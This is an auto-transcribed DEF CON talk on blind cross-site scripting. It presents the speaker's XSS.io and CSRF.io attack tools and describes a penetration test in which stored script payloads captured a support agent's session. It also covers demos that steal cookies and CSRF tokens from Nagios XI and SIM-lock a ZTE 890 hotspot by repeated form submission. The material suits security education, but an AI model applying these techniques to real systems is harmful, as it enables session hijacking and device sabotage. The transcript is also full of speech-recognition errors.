 All right, how's it going everybody last last talk for the day at Defcon you guys having fun Drunk yet It's like a hollocks. Fuck yeah. All right, so I'm Adam Baldwin. No, thank you. I Am definitely not this Adam Baldwin if you were here to see that Adam Baldwin it is at the pool on the roof So I'm this Adam Baldwin. I'm the chief security officer and yet a security lead for side brand lift security, and I'm on Twitter at Adam underscore Baldwin And we're gonna blow through a lot of slides. I got 59 slides and 20 minutes plus two demos. So let's go fast We're gonna talk about what blind cross-site scripting is how I'm using it in penetration tests some challenges with Blind cross-site scripting the introduction of the tool xss.io And I'll make it public after the talk and some special surprises if I I don't run over So what the fuck is blind cross-site scripting? Right, it seems like something I made up. I did actually I've seen it mentioned before but it's really just a variant of cross-site scripting So let's talk about cross-site scripting first just to give people in the crowd If you're offering the cross-site scripting a little overview it comes in three variants right reflected persistent stored or Dom so reflected is a part of your query Parameter is reflected back into the HTML and rendered in your browser. It's it's reflected basically back the clients Sending it it's getting the documents getting manipulated and sent back and rendered Persistent that payload is getting stored somewhere getting rendered back into the client and then getting sent back to the client and rendered at a Future point in time and then Dom where all of that is basically happening client-side the actual It's being manipulated client-side rather than the actual document or anything being stored If you want to know more there's plenty of information out there. That's not what we're going to talk about we're talking about a specific variant of persistent or stored cross-site scripting right and Where I saw blind cross-site scripting mentioned first was an academic blog post from years back But it's also known as like authenticated XSS. Basically what we're doing with blind cross-site scripting is we're throwing a bunch of payloads out there Into various inputs in the application and we are looking to see if we get any response back So blind press it Just gonna stop saying that blonde cross-sites blind blind. Ooh It's a different challenge It's not like blind sequel injection where you actually get some type of immediate feedback timing or response Alerts whatever you have no idea where your payload is going to end up. You don't know whether your payload is going to execute or when So you have to think ahead about what you want to accomplish with Basically stored cross-site scripting right? What do you actually want to? Get out of what you're doing and The key piece here, and this is what XSS.io provides is you have to be listening You have to listen and listen forever Because that input is going to persist someplace in some database and at some point in time some developer is going to screw up and render that in some browser someplace Not properly encoded. It's going to happen. It happens all the time so What I like to think about Blind cross-site scripting is it's the Carly Rae Jepsen of Cross-site scripting attacks. It's call me maybe right it's a You might get a call back. It's throwing stuff against the wall and thinking that it might actually call you back So let's take an example from a recent penetration test that I did that was completely black box I only had access to the public-facing interfaces of all of their web applications and I wanted to see basically how I could cross that that barrier that trust boundary between the private Admin customer service Portal and the public-facing chat application. So that's me and Basically what I what I did was I set up a chat session with customer service rev And included in that customer in that chat and every single payload in my name and description in the body I put uniquely tagged Basically script payloads right script source equals some unique identifier and that's all I did I did a very simple straightforward and I went to see if they called back it didn't so the chat rep got this and it was also stored into the database I had no idea if they kept track of this stuff or not It's just what I did. I threw this stuff out there and I left left the XSS.io listening and Time passed actually a couple of days and time passed and Our chat representative. This is what I surmise based on talking to the client is they've got a little search interface for their their Chats and a little the customer service rep searched for something and it pulled the the payload out of the database and rendered it in her browser Little evil payload there and Bazinga, right? We got a call back So it sent it rendered your browser and send me back information about that application not that Exciting but the fact that I I now had a connection to Her session right? I was for all intents purposes her right? I knew where I could put input into the application I knew it was a description field of that particular chat none of the other fields triggered just a description And I knew exactly where I could put it to then get Send some other payload Happy me So steps to sort of a successful XSS exploit with you know blind across a scripting It's you have to chaot carefully choose the right payload for the right situation And you have to really really get lucky It's basically magic you throw crap against the wall until you know it might stick And the reason I say you have to pick the right payload is because if you go to say like HTML 5 sec You know more and those guys have just piles of payloads that you can use in different variants. There's just Just hundreds and thousands of different variants you can use But if you think about it, why would I use it like a CSS type variant injection attack in a first name or A description field I wouldn't so that narrows down your payloads even even more What I found is just the most basic of payloads just basically You know script source is really really effective in most situations I tried a variant of like a peros or a bird proxy plug-in that Basically rendered all these different like it and for every request I got it enumerated all of different injection points and then did you know Thousands of payloads and the ones that came back were always the really really simple ones So I just I've just stopped doing it I just use basically a few manual payloads and it's really really effective for me So you plan on your you'll your payload will be used in your in your application think about it Where's a user agent being stored? Where are these various headers that your client that you're sending to the application? Where's it going to be stored? How are they going to use it? How is it used in a reporting interface? If you think about those things, you'll you'll think about and you'll know you'll be able to kind of plan what you want to actually inject Will you be getting a context of a user that might have access to useful information is an application you actually care about? Those are some things to think about here's some nice targets that I found a log viewers the log headers exception handlers things like that That log your request your post body things like that Customer service apps chats tickets forums anything moderated anything that you've got that cross the trust boundary where you've got the any user that's going to be rendering in a different context and I don't know how that slide got in there, but I'll let you take it in and if you want to play around There might be something With this particular application Got it, okay So blind XSS management is a giant paint in the ass to deal with generating unique Identifiers for all these different payloads and keeping track of them. And so I basically wrote a tool I was lazy. I wrote a tool. It's counterintuitive So XSS that IO can help. So what is the XSS that IO tool? It's basically a tool to Deal with cross-site stripping exploits. So sometimes you need all the space you can get I'm gonna make XSS IO public so that anyone can create and have available payloads online at that domain and and use them 24 hours a day. It doesn't I mean basically it'll be up all the time I hope It's you don't need a short URL and I'll demonstrate this you don't actually need like XSS.io slash Some unique identifier like if you're using you know bit.ly in your your payloads your you have an extra like five characters There for the the GUI and you don't have to have that because we do some basically refer a base reader X Which I'm sure somebody here. I'll find a way to break and ruin that but whatever exploit the exploit creator it's a snippets for common tasks and you can quickly sort of just create stacked up exploits weaponize your your once you found a vulnerability you can weaponize it very quickly and We've got the dead dropper blind XSS manager. It's a simple API. You say I'm dropping This type of payload at this location and it gives you an ID back and that's all that's all you need And it's a quick super fast API. It's built on top of Node and Redis You know we can talk about architecture after the talk or whatever if you're interested. So let's do a demo if this works We're gonna demo a vulnerability in Nagios enterprise Basically Okay, what the hell is that Okay, so here's this quick tour as fast as we go here snippets snippets are basically reusable code blocks, right? They're just they're literally just functions That's what that's all they are there But job script function that does a thing and calls a callback and that way we can stack up We can just say do this do this really small thing and do the next thing and the next thing the next thing You can chain them together Load value by selector as an example is really useful for say finding a CSRF token from some page Here's our exploit list. There's nothing there because I dumped the database before I came up here And here's the exploit actually creator And we'll get into that second. Here's the redirect view and the dead drop. So let's actually Drop something in Nagios XI so there's a configuration manager that You can access if it's public Normally you see it's you have to be logged in to access it. What we'll do. I've got actually a Just a little Firefox plug-in that'll make public too. I don't have it quite polished yet But let's say we want to get a drop for a username Have username Get ID Paste it in there. It's the first one, right? It's one just increments up Please don't drop a bunch of shit in excess of that. Oh, do we jerk? and We're just gonna log in log and fail right great, but but that got stored someplace that got put into a log So let's log into Nagios and And actually trigger that so if we look At dead drop we got one we got one dropped. We don't care about anything doesn't call back So I don't bother showing anything or storing anything or whatever It's not gonna Nagios configuration manager Okay, so if we happen to go to Config manager log these are happens to go In there we've got obviously we got some injection happening here And if we go back to the Explorer, please work We actually got a call back. So we got it says that at Nagios.example.com slash this URL We put it in the username field. We actually get a bunch of data back, and this is horribly ugly I'm trying to find a good way of representing this data but It's it's difficult. I'm actually logging the entire HTML contents of the page the source IP that called back the window.location the Session cookies all that stuff it gets it gets loaded right So let's let's sort of weaponize this particular thing So this is the page that called back the window.location and Let's quickly first thing we want to do is we want to create an exploit and say okay We want to we're just gonna simple thing of finding the CSRF token of one of the pages Just because that's what we've got planned so we look we can load a value byselector at a particular URL this particular URL we want is We'll load that URL Our selectors our input box and name equals NS NSP and That returns value and let's just alert that value and so this one snippet returns value and we can just say okay I want to drag You know basically the return value of that into the input of this other snippet and it goes That's okay Generator right there Now let's go and Let's say we have limited space So let's say we actually need every single character for XSS.io. We can't have any trailing anything Let's show the refer basically working in action as well And so we're gonna add a redirect from that particular URL that gets loaded and we're gonna read redirect that to Of course, I didn't copy the frickin Interexploit lists will copy the unique identifier For that and so we're going to So we're gonna say if anything comes into XSS.io from this refer Load this redirect into this page basically load load our payload right and that could be a beef hook That doesn't have to be something from XSS.io. It could be whatever You could load up XSS chef, you know from from koto. You can load up whatever you want. You can redirect into whatever So let's save it pray this works If it doesn't work, there's a space after that So now that we have that let's go back and redrop Let's just drop script source equals and let's just do so you can do a pretty pretty small payload and I'm actually logged in but it it still dumps it in there's a failed login So we load up the log We should get another Oh cool. It's not gonna work So I get for doing a live demo. What's that? And when I when I dropped it so it did a post back Let's see Let's bracket that's bracket and bracket. Oh man demo gods are Pissed off at me If I just keep reloading the page, right? So let's look just quick Aha, you don't need it You don't need it backslash backslash will use whatever the current protocol is So you can make it even shorter but No, I know what I know what frickin happened This thing right here It's a bug. It's I knew it was gonna bite me. It basically It doesn't strip spaces So I Break things. I don't build them. Yeah, whatever Okay, so that's the failed demo. It's should run. There's some bugs. I love contributions I'm gonna make the code base public on GitHub and people can attribute It needs some polish, but it's there Like I said, whenever we were refreshing that log to these dead drops were calling back So we got 18 events in each in each individual time. It actually is called back we've got We've got more events more more sessions more whatever how much time? All right, so that's Blind cross-excripting. That's XSS.io again some bugs. I'm not gonna debug the demo anymore I have a special treat however That maybe will actually work And if they both fail, that's great. I've got another tool to announce CSRF.io To basically deal with CSRF attacks. It's kind of a you know, I Gotta show my slide because But wait, there's more okay so Let's do this quick CSRF.io is basically you can create little scripts of CSRF style attacks, submitting forms, loading content, whatever Here's just a few that are out there and you can make you can make them public whatever We are going to try Does anyone here have a ZTE 890? one of these Anybody don't be shy raise your hand, please You have one? It's it's um, yeah, ZTE 890 Verizon Don't click on any link I send you So this particular so let's just show the tool quick basically this particular vulnerability is Puck locking out the sim so you have to go get a new one if you If you do it too many times, right? So what I did was it submits the form to vz.hotspot, which this thing conveniently gives you so even if you change the internal IP address it you can Reliably hit the device every single time from the outside Pause for X seconds and let's redirect back to the URL So all we're going to do is we're hit the form hit the form hit the form What I was going to try to do is connect to it and see if it would actually Kill it, but who knows if this thing will actually even work 890 I've never fully tried this out because I didn't want to break the device before I Had to two F nine two Four a five. Oh, don't join that. Okay, so here we are online Apparently that's the test. All right, so let's hit the exploit URL and see what actually happens See if it actually does it Incorrect popcode, huh cool If you get the timing down right that that doesn't pop up So if you get if you can short it out. Yes, it's connected to it Keeps refreshing Time it might not be right, but it will keep repeating the form over and over and over again If I could actually connect to it it will would check the count Anyway, it's a useful tool that could quickly copy you can literally copy the request response right from like firebug or something and drop it in to the CSRF that I have a form and submit the request and just it's at that point it's it's It's out there in public and you can send send the link. So basically a couple of horribly failable demos and Oh This came up. I don't have internet Hey, that didn't fail And that's it